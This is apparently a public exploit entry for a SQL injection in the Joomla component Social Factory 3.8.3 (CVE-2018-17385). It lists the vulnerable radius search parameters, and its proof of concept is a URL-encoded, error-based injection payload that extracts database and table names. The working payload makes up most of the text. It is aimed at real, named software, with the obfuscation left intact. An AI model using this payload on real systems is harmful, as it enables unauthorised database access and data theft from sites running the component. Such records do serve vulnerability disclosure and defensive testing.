Joomla! Component Social Factory 3.8.3 - SQL Injection

Ihsan Sencan 2018-09-25 webapps php 80
# # # # #
# Exploit Title: Joomla! Component Social Factory 3.8.3 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/social-factory/
# Version: 3.8.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17385
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/socialfactory-events/socialfactory-events-radius-search?option=com_socialfactory&view=page&task=page.display&radius[lat]=[SQL]&radius[lng]=[SQL]&radius[radius]=[SQL]
# 
# %20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
#  
# # # #